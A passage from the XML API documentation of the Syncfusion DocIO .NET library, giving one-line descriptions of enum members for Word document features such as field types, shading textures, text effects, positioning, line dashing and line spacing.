            <summary>
            Dark vertical shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDiagonalCross">
            <summary>
            Diagonal cross shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDiagonalDown">
            <summary>
            Diagonal down shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDiagonalUp">
            <summary>
            Diagonal up shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureHorizontal">
            <summary>
            Horizontal shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureNone">
            <summary>
            No shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureSolid">
            <summary>
            Solid shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureVertical">
            <summary>
            Vertical shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureNil">
            <summary>
            Nil shading.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FieldType">
            <summary>
            Specifies the type of fields.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNone">
            <summary>
             Field type is not Specifies. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAddin">
            <summary>
            Specifies Addins.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAdvance">
            <summary>
              Offset subsequent text within a line to the left, right, up or down. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAsk">
            <summary>
             Prompt the user for text to assign to a bookmark. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAuthor">
            <summary>
            The name of the document's author from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAutoNum">
            <summary>
            Insert an automatic number. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAutoNumLegal">
            <summary>
               Insert an automatic number in legal format. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAutoNumOutline">
            <summary>
            Insert an automatic number in outline format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAutoText">
            <summary>
            Insert an AutoText entry. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAutoTextList">
            <summary>
             Insert text based on style. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldBarCode">
            <summary>
            Insert a delivery point barcode. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldComments">
            <summary>
            The comments from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldCompare">
            <summary>
            Compares two values. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldCreateDate">
            <summary>
            The date the document was created.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldData">
            <summary>
            Specifies data. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDatabase">
            <summary>
            Insert data from an external database. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDate">
            <summary>
            Specified Today`s Date.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDDE">
            <summary>
            Specified Type as FieldDDE. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDDEAuto">
            <summary>
            Specified Type as FieldDDEAuto. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDocProperty">
            <summary>
             Insert the value of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldDocVariable">
            <summary>
            Insert the value of the document variable. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldEditTime">
            <summary>
            The total document editing time. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldEmbed">
            <summary>
            Specifies OLE embedded object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldEmpty">
            <summary>
            Specified Empty Field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldExpression">
            <summary>
            Specifies Field Expression.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFileName">
            <summary>
             The document's name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFileSize">
            <summary>
            The size on disk of the active document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFillIn">
            <summary>
             Prompt the user for text to insert in the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFootnoteRef">
            <summary>
            Specifies FieldType as FootnoteRef.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFormCheckBox">
            <summary>
            Specifies Check box control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFormDropDown">
            <summary>
            Specifies Drop Down box control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFormTextInput">
            <summary>
            Specifies Text control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldFormula">
            <summary>
             Calculates the result of an expression.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldGlossary">
            <summary>
            Specifies FieldGlossary.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldGoToButton">
            <summary>
            Specifies GoToButton control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldHTMLActiveX">
            <summary>
            Specifies HTMLActiveX control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldHyperlink">
            <summary>
            Specifies Hyperlink control.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldIf">
            <summary>
            Evaluate arguments conditionally. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldImport">
            <summary>
            Specifies FieldType as Import.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldInclude">
            <summary>
            Specifies FieldType as Export.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldIncludePicture">
            <summary>
            Insert a picture from a file. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldIncludeText">
            <summary>
            Insert text from a file. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldIndex">
            <summary>
            Create an index. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldIndexEntry">
            <summary>
              Mark an index entry. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldInfo">
            <summary>
            Data from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldKeyWord">
            <summary>
            The keywords from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldLastSavedBy">
            <summary>
            Name of user who last saved the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldLink">
            <summary>
            Linked OLE2 object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldListNum">
            <summary>
            Insert an element in a list. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldMacroButton">
            <summary>
            Run a macro. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldMergeField">
            <summary>
            Insert a mail merge field. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldMergeRec">
            <summary>
            The number of the current merge record.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldMergeSeq">
            <summary>
            Merge record sequence number. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNext">
            <summary>
            Go to the next record in a mail merge. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNextIf">
            <summary>
            Conditionally go to the next record in a mail merge. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNoteRef">
            <summary>
            Insert the number of a footnote or endnote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNumChars">
            <summary>
            The number of characters in the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNumPages">
            <summary>
             The number of pages in the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldNumWords">
            <summary>
            The number of words in the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldOCX">
            <summary>
            Represents an ActiveX control such as a command button etc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldPage">
            <summary>
            Insert the number of the current page. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldPageRef">
            <summary>
            Insert the number of the page containing the specified bookmark. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldPrint">
            <summary>
            Download commands to a printer. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldPrintDate">
            <summary>
            The date the document was last printed. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldPrivate">
            <summary>
            Stores data for documents converted from other file formats.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldQuote">
            <summary>
            Insert literal text. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldRef">
            <summary>
            Insert the text marked by a bookmark. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldRefDoc">
            <summary>
            Create an index, table of contents, table of figures, and/or table of authorities by using multiple documents. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldRevisionNum">
            <summary>
            Insert the number of times the document has been saved. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSaveDate">
            <summary>
            The date the document was last saved.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSection">
            <summary>
            Insert the number of the current section. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSectionPages">
            <summary>
            Insert the total number of pages in the section. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSequence">
            <summary>
            Insert an automatic sequence number. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSet">
            <summary>
            Assign new text to a bookmark. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSkipIf">
            <summary>
            Conditionally skip a record in a mail merge. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldStyleRef">
            <summary>
            Insert the text from a like-style paragraph. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSubject">
            <summary>
             The document's subject from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSubscriber">
            <summary>
             The document's Subscriber from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldSymbol">
            <summary>
             Insert a special character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTemplate">
            <summary>
            The name of the template attached to the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTime">
            <summary>
             The current time. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTitle">
            <summary>
            The document's title from Summary Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTOA">
            <summary>
            Create a table of authorities. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTOAEntry">
            <summary>
            Make a table of authorities entry. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTOC">
            <summary>
            Create a table of contents. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldTOCEntry">
            <summary>
             Make a table of contents entry. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldUserAddress">
            <summary>
            Address from Tools Options User Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldUserInitials">
            <summary>
            Initials form Tools Options User Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldUserName">
            <summary>
             Name from Tools Options User Info. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldShape">
            <summary>
            Specifies FieldType as Shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldBidiOutline">
            <summary>
            Specifies FieldType as BIDIOUTLINE.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldAddressBlock">
            <summary>
            Specifies AddressBlock
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FieldType.FieldUnknown">
            <summary>
             Specifies FieldType as Unknown.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReferenceKind">
            <summary>
            Specifies the information to be included in the cross-reference.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.ContentText">
            <summary>
            Insert text value of the specified item. For example, insert text of the specified heading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.AboveBelow">
            <summary>
            Insert the word "Above" or the word "Below" as appropriate.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.PageNumber">
            <summary>
            Insert the page number of the specified bookmark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.NumberRelativeContext">
            <summary>
            Insert paragraph with as much of its relative position in the outline numbered list as necessary to identify the item.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.NumberNoContext">
            <summary>
            Insert paragraph without its relative position in the outline numbered list.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceKind.NumberFullContext">
            <summary>
            Insert complete paragraph number.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReferenceType">
            <summary>
            Specifies the type of item for which a cross-reference is to be inserted.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReferenceType.Bookmark">
            <summary>
            Insert the bookmark text as appropriate.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.CaptionNumberingFormat">
            <summary>
            Specifies the number style to be used with the caption label text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.CaptionNumberingFormat.Number">
            <summary>
            Numbers 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.CaptionNumberingFormat.Roman">
            <summary>
            Roman Numerals
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.CaptionNumberingFormat.Alphabetic">
            <summary>
            Alphabets
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.CaptionPosition">
            <summary>
            Specifies the position of the caption label text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.CaptionPosition.AboveImage">
            <summary>
            Caption is positioned above the Image.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.CaptionPosition.AfterImage">
            <summary>
            Caption is positioned below the image.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DocumentViewType">
            <summary>
            Specifies the view type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DocumentViewType.None">
            <summary>
            Specifies that the document will be rendered in the default view of the application.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DocumentViewType.PrintLayout">
            <summary>
            Everything that will appear in the printed document appears on the screen.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DocumentViewType.OutlineLayout">
            <summary>
            Shows the headings and subheadings in the word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DocumentViewType.NormalLayout">
            <summary>
            Document appears with a dotted line separating the pages and/or document sections.
            Columns, drawings, headers/footers, footnotes/endnotes, and comments do not appear. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DocumentViewType.WebLayout">
            <summary>
            Designed to show the word document will look as a web page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ZoomType">
            <summary>
            Specifies the type of zoom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ZoomType.None">
            <summary>
            Indicates to use the explicit zoom percentage. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ZoomType.FullPage">
            <summary>
            Zoom percentage is automatically recalculated to fit one full page. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ZoomType.PageWidth">
            <summary>
            Zoom percentage is automatically recalculated to fit page width. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ZoomType.TextFit">
            <summary>
            Zoom percentage is automatically recalculated to fit text. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.LineNumberingMode">
            <summary>
            Specifies the line numbering mode to apply.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineNumberingMode.RestartPage">
            <summary>
            Line numbering restarts at the start of every page
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineNumberingMode.RestartSection">
            <summary>
            Line numbering restarts at the section start. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineNumberingMode.Continuous">
            <summary>
            Line numbering continuous from the previous section. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineNumberingMode.None">
            <summary>
            Specifies LineNumberingMode as None.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.PageBordersApplyType">
            <summary>
            Specifies the type of page border to apply.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PageBordersApplyType.AllPages">
            <summary>
            Page border applies to all pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PageBordersApplyType.FirstPage">
            <summary>
            Page border applies only to first pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PageBordersApplyType.AllExceptFirstPage">
            <summary>
            Page border applies to all pages except the first.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.PageBorderOffsetFrom">
            <summary>
            Specifies the position of page border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PageBorderOffsetFrom.Text">
            <summary>
            Page border is measured from text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PageBorderOffsetFrom.PageEdge">
            <summary>
            Page border is measured from the edge of the page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.TextEffect">
            <summary>
            Specifies the type of animation to apply to a font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.None">
            <summary>
            No animation. <i>Default</i>.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.LasVegasLights">
            <summary>
            Alternating color and pattern border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.BlinkingBackground">
             <summary>
            Black-and-white, blinking background.
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.SparkleText">
            <summary>
            Randomly alternating pattern and color background.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.MarchingBlackAnts">
            <summary>
            Rotating black-dashed border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.MarchingRedAnts">
            <summary>
            Rotating red-dashed border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextEffect.Shimmer">
            <summary>
            Font shimmers in and out of focus.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.OutlineLevel">
            <summary>
            Specifies the outline level to apply to a paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level1">
            <summary>
            Outline level 1.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level2">
            <summary>
            Outline level 2.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level3">
            <summary>
            Outline level 3.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level4">
            <summary>
            Outline level 4.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level5">
            <summary>
            Outline level 5.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level6">
            <summary>
            Outline level 6.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level7">
            <summary>
            Outline level 7.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level8">
            <summary>
            Outline level 8.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.Level9">
            <summary>
            Outline level 9.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.OutlineLevel.BodyText">
            <summary>
            No outline level.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FrameWrapMode">
            <summary>
            Specifies the Wrapping mode of the frame
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.Auto">
            <summary>
            This value specifies automatic text wrapping.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.NotBeside">
            <summary>
            This value specifies that there is no text wrapping to either side of the frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.Around">
            <summary>
            This value specifies that text is wrapped around the frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.None">
            <summary>
            Text is not wrapped around the frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.Tight">
            <summary>
            This value specifies that text is tightly wrapped around the frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FrameWrapMode.Through">
            <summary>
            This value specifies that text is wrapped through the frame, to the contours of the contents of the frame.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.HorizontalRelation">
            <summary>
            Specifies the horizontal relative position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalRelation.Column">
            <summary>
            Relative to column.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalRelation.Margin">
            <summary>
            Relative to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalRelation.Page">
            <summary>
            Relative to page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.VerticalRelation">
            <summary>
            Specified the vertical relative position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalRelation.Margin">
            <summary>
            Relative to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalRelation.Page">
            <summary>
            Relative to page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalRelation.Paragraph">
            <summary>
            Relative to paragraph.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.HorizontalPosition">
            <summary>
            Specifies the absolute horizontal position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalPosition.Left">
            <summary>
            The object is aligned to the left of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalPosition.Center">
            <summary>
            The object is centered to the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalPosition.Right">
            <summary>
            The object is aligned to the right of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalPosition.Inside">
            <summary>
            The object is aligned to the inside of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HorizontalPosition.Outside">
            <summary>
            The object is aligned to the outside of the reference origin.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.VerticalPosition">
            <summary>
            Specifies the absolute vertical position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.None">
            <summary>
            No vertical positioning
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.Top">
            <summary>
            The object is aligned to the top of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.Center">
            <summary>
            The object is aligned to the center of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.Bottom">
            <summary>
            The object is aligned to the bottom of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.Inside">
            <summary>
            The object is aligned to the inside of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.VerticalPosition.Outside">
            <summary>
            The object is aligned to the outside of the reference origin.
            </summary>    
        </member>
        <member name="T:Syncfusion.DocIO.LineDashing">
            <summary>
            Specifies the dash style for a line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.Solid">
            <summary>
            Line is solid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.Dash">
            <summary>
            Line consists of dashes only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.Dot">
            <summary>
            Line consists of dots only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.DashDot">
            <summary>
            Line is a dash-dot pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.DashDotDot">
            <summary>
            Line is a dash-dot-dot pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.DotGEL">
            <summary>
            Line consists of dots only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.DashGEL">
            <summary>
            Line consists of dashes only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.LongDashGEL">
            <summary>
            Line consists of long dashes only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.DashDotGEL">
            <summary>
            Line is a dash-dot pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.LongDashDotGEL">
            <summary>
            Line is a long dash and short dot pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineDashing.LongDashDotDotGEL">
            <summary>
            Line is a long dash and short dot-dot pattern.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ArrowheadStyle">
            <summary>
            Specifies the style of the arrowhead at the end of a line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadNone">
            <summary>
            No arrowhead.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadTriangle">
            <summary>
            Triangular.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadStealth">
            <summary>
            Stealth-shaped.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadDiamond">
            <summary>
            Diamond-shaped.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadOval">
            <summary>
            Oval-shaped.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ArrowheadStyle.ArrowheadOpen">
            <summary>
            Open.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.WrapMode">
            <summary>
            Specifies the wrap mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WrapMode.Square">
            <summary>
            Square wrap mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WrapMode.ByPoints">
            <summary>
            ByPoints wrap mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WrapMode.None">
            <summary>
            No wrap mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WrapMode.TopBottom">
            <summary>
            TopBottom wrap mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.WrapMode.Through">
            <summary>
            Through wrap mode.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.PropertyValueType">
            <summary>
            Specifies the value type for the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.Boolean">
            <summary>
            Specifies Value type as boolean.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.Date">
            <summary>
             Specifies Value type as date.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.Float">
            <summary>
             Specifies Value type as float.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.Double">
            <summary>
             Specifies Value type as double.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.Int">
            <summary>
             Specifies Value type as integer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.String">
            <summary>
             Specifies Value type as String.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.ByteArray">
            <summary>
             Specifies Value type as byte array.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyValueType.ClipData">
            <summary>
             Specifies Value type as ClipData.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.PropertyType">
            <summary>
            Specifies the type of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyType.Summary">
            <summary>
            Specifies Property Type as Summary.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyType.DocumentSummary">
            <summary>
            Specifies Property Type as DocumentSummary.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.PropertyType.Custom">
            <summary>
            Specifies Property Type as Custom.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.LineSpacingRule">
            <summary>
            Specifies a line spacing format to be applied to a paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineSpacingRule.AtLeast">
            <summary>
            Line spacing is always at least a specified amount. The amount is specified separately.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineSpacingRule.Exactly">
            <summary>
            Line spacing is only the exact maximum amount of space required. This setting commonly uses less space than single spacing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LineSpacingRule.Multiple">
            <summary>
            Line spacing determined by the number of lines indicated.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ShapeHorizontalAlignment">
            <summary>
            Specifies the horizontal alignment of a shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.None">
            <summary>
            The object is explicitly positioned using position properties.
            </summary>
